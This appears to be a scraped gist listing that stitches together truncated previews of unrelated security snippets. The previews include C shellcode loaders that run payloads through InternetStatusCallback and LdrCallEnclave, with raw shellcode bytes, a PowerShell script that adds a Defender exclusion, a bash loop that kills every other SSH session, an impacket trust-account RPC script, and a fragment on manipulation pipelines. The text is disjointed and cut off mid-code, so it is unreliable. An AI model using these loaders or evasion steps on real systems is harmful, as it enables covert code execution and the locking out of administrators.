
# ms-block.ps1 - Windows telemetry/AI blocker (idempotent, no dupes)
# Run as Administrator
$hostsPath = "$env:windir\System32\drivers\etc\hosts"
$marker = "# --- MS-BLOCK START ---"
$endMarker = "# --- MS-BLOCK END ---"
# Exclude hosts file from Defender
Add-MpPreference -ExclusionPath $hostsPath -ErrorAction SilentlyContinue
# Read current hosts, strip any previous MS-BLOCK section
/*
* Callback Chaining PoC - Windows API Callback Chain Execution
*/
#include <Windows.h>
#include <dbghelp.h>
#include <powrprof.h>
#include <stdio.h>
#pragma comment(lib, "user32.lib")

Psychological Manipulation Pipeline: A Scientifically Validated Framework

Context

Reference: https://x.com/Daractenus/status/2006666543669887158

This document analyzes the psychological mechanisms exploited in influence operations, with specific reference to AI-generated disinformation campaigns (e.g., Russian bot networks deploying AI-generated "Polish women" demanding EU exit). The framework synthesizes peer-reviewed research from cognitive psychology, social psychology, and behavioral science.


Phase 1: Target Identification & Profiling

emdnaia / Stored_Procedure_Honeypot.md
Last active November 7, 2025 23:45
Stored_Procedure_Honeypot
/*
## File Descriptor INT_MAX Overflow
----
- Info:
Tweet: https://x.com/spendergrsec/status/1958264076162998771
Ref: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=04a2c4b4511d186b0fce685da21085a5d4acd370
emdnaia / nossh.sh
Last active October 20, 2025 01:07
MY_TTY=$(tty | sed 's/\/dev\///')
MY_SESSION_PIDS=$(ps aux | grep "sshd-session.*$MY_TTY" | awk '{print $2}' | tr '\n' '|' | sed 's/|$//')
echo "Protecting PIDs: $MY_SESSION_PIDS"
while true; do
ps aux | grep 'sshd-session' | grep -v grep | grep -v '\[listener\]' | awk '{print $2}' | grep -vE "^($MY_SESSION_PIDS)$" | xargs -r kill -9 2>/dev/null
sleep 0.01 # Check every 10ms - way faster
done
emdnaia / JasonToddIsTheBestRobin.c
Created September 25, 2025 17:25 — forked from whokilleddb/JasonToddIsTheBestRobin.c
Unnecessarily complicated way of controlling shellcode execution using InternetStatusCallback()
#include <windows.h>
#include <wininet.h>
#include <stdio.h>
#pragma comment(lib, "wininet.lib")
// notepad.exe shellcode
char shellcode[] = {
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51,
0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52,
emdnaia / enclave.c
Created August 3, 2025 22:56 — forked from whokilleddb/enclave.c
Run shellcode using LdrCallEnclave
#include <stdio.h>
#include <windows.h>
// Shellcode template from: https://gist.github.com/kkent030315/b508e56a5cb0e3577908484fa4978f12
// Compile using: x86_64-w64-mingw32-gcc -m64 enclave.c -o enclave.exe -lntdll
EXTERN_C NTSYSAPI
NTSTATUS
NTAPI LdrCallEnclave(
_In_ PENCLAVE_ROUTINE Routine,
stream {
map $ssl_preread_server_name $singbox {
trojan.example.com trojan;
trojan-ws.example.com trojan-ws;
trojan-ws-6.example.com trojan-ws-6;
vmess.example.com vmess;
vmess-ws.example.com vmess-ws;
vmess-ws-6.example.com vmess-ws-6;
}
upstream trojan {
emdnaia / lsarlookupsids3_aes.py
Created February 6, 2025 22:56 — forked from ThePirateWhoSmellsOfSunflowers/lsarlookupsids3_aes.py
Perform a lsarlookupsids3 with a trust account, it uses netlogon as SSP (see [MS-NRPC] 3.3) (AES version)
from impacket.dcerpc.v5 import epm, lsad, rpcrt, transport, lsat, ndr, nrpc
from impacket.uuid import bin_to_uuidtup
from binascii import unhexlify
from random import randbytes
import sys
# Perform a lsarlookupsids3 with a trust account, it uses netlogon as SSP (see [MS-NRPC] 3.3)
# Pure TCP RPC is used (ncacn_ip_tcp option)
# AES is used, so you need impacket #1848 (https://github.com/fortra/impacket/pull/1848)
# Tested with impacket 0.12.0 on GOAD